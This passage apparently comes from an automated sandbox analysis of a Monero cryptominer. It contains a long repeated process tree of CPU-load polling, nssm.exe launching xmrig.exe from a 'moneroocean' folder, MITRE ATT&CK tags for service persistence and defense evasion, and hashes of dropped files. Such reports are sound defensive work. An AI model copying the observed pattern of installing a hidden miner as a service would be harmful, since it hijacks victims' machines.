                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                  PID:340
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:240
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4112
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:60
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2208
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4632
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4128
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2128
                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:4516
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1440
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2204
                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:1760
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4892
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:4284
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4504
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2612
                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                            PID:3872
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2116
                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:464
                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:4800
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1104
                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4368
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:396
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5032
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3924
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:2800
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2080
                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5096
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                            PID:2876
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:320
                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:2420
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:3396
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:200
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3580
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:3476
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4764
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:856
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2264
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3916
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:1472
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:3376
                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3348
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:4948
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2496
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2216
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:2492
                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:1948
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                            PID:2500
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:2224
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4628
                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:808
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1884
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                    PID:4428
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:2568
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4272
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                        PID:3900
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:2668
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1704
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                            PID:4632
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1848
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4808
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                PID:1672
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:2812
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:3112
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                    PID:2204
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:2108
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:3896
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                        PID:476
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:264
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2796
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                            PID:2508
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:864
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:692
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                PID:2192
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1080
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:736
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:2320
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\moneroocean\xmrig.exe"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:4316

                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                    System Services

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1569

                                                                                                                                                                                                                                                                                                                    Service Execution

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1569.002

                                                                                                                                                                                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                                                                                    PowerShell

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1059.001

                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                                    Service Stop

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1489

                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      42d4b1d78e6e092af15c7aef34e5cf45

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      6cf9d0e674430680f67260194d3185667a2bb77b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      99812f345c886f76cb03a2b43197068f

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      d58e7ac73de09a0964dbddb4bcb3e20349bb44bf

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      bc994a878975a3ef73255ec0ee07c036410716e001220b3bfcf6c5ff861f0fc7

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      42845bebc2eb86390eba73b951bae94f8a184629547584ff45c411d0fac7a53f278ad83802ef3cce54de674b98c763912befd547e8460523717202fd1f43f9e8

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      4d046bd9f31493dd6e6e497643841bc2

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      69b9618afb429194573f8792a8c51f3830a6f944

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      22cc85a75685fa88d0d562d9919c422b508c30ed96f7fd41898302a16ca3900d

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      e9673decd267eab61a560d822e8c160bda1d4661aadefcceb20d61ce1c3133d18e4a7d18ae233c111b739eeaf2114643839b51920d401226bb8e7bcef2fece09

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      1ed2e087316c60c82d277f12156255a7

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      723d3333fa92601f33109d0c98f86818f38f24a7

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      86e8341aa5e87c971a0041fdbe014b265fd6d5fdb7e941d2a957a94eca1f7670

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      024fc981ca302bcd0a1b5dca679af611ff06e81c22b4bfd79f4789ef0a7e6cbce99e40ea80aa0a3cf1ccd6be85c7c3642b798da15a83ecb073fdf0e8be95a955

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      c5bd5b5f9ed81243d1827057b7f2cea6

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      6a0a43ec545cd0c83baaa1dd93fdfc9752957e1c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      835445ec4f0e140f67c82360d357ed99d557c1ddd2ad0240e9d5188f668af392

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      bddeb2861507ae4ba1779c9e80c778e6041bdfe14ccb2fac65d19f9e583d87189a7942a39670eef78c5f31a0e6e95f54014ebd4c9a7df466547d7e960252f1cb

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      7a495a261834df84596da4b15d414787

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      87c0c3d89153ac39466ec8c8c8304747d8228492

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      8b315a22a2efe0dae5393db1e5e2d504b34a8dc24b427bc1ec9d4786148a3991

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      dd41aa7ccf9ee97b106b5b551301ef8116f9688383ee26f4897dee8db142a6b7424de80ed54b58f86f11712634b09fe3e02c6cab0a02f99e56e870a8fd19fdb4

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      50e22c2da0007c71a200dbf1987d9c9f

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      44acfbb8f1b412222fb28e05c7b0a34e80e92437

                                                                                                                                                                                                                                                                                                                      SHA256

